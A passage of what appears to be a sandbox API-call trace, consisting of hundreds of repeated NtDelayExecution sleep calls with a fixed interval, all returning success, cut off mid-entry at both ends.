(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0150.142] NtDelayExecution 